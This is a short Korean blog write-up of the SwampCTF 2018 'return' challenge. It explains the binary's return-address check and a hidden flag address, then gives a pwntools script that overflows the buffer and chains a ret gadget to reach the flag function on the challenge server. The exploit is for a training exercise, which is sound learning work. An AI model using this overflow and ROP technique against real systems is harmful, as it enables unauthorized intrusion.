constWORLDant

swamp return writeup 본문

0x07 CTF/[스스로 푼 것]

swamp return writeup

data type ConS_tanT 2018.04.08 23:35

소요 시간 : 5시간 


문제 의도

1 read함수를 통해 50바이트를 읽어온다.

2 retaddr이 &locret_8048595보다 크면 종료 


3. 숨겨진 주소 : 0x08048AEA 



ropgadget 중 ret를 이용해야 함.


payload : 버퍼를 0x26 채운 뒤 + ret 가젯 주소 + 내가 가고싶은 주소(플래그 있는 주소) 


코드

from pwn import *


context.log_level ='debug'


p = remote('chal1.swampctf.com',1802)

#p = process("./return")

print p.recvuntil("do: ")

payload =""

dummy = "A"*(0x26 + 4)

_ret = p32(0x8048372)

shell = p32(0x8048615)

payload = dummy + _ret + shell

p.send(payload)

print p.recv(2048)

print p.recv(1024)

print p.recv(1024) 


'0x07 CTF > [스스로 푼 것]' 카테고리의 다른 글

Plaid CTF ropasaurusrex Expliot  (0) 2018.05.02
whitehat malloc  (0) 2018.04.14
swamp return writeup  (0) 2018.04.08
swamp journey writeup  (0) 2018.04.08
sunshine password writeup  (0) 2018.04.08
sunshine hackername writeup  (0) 2018.04.08
0 Comments
댓글쓰기 폼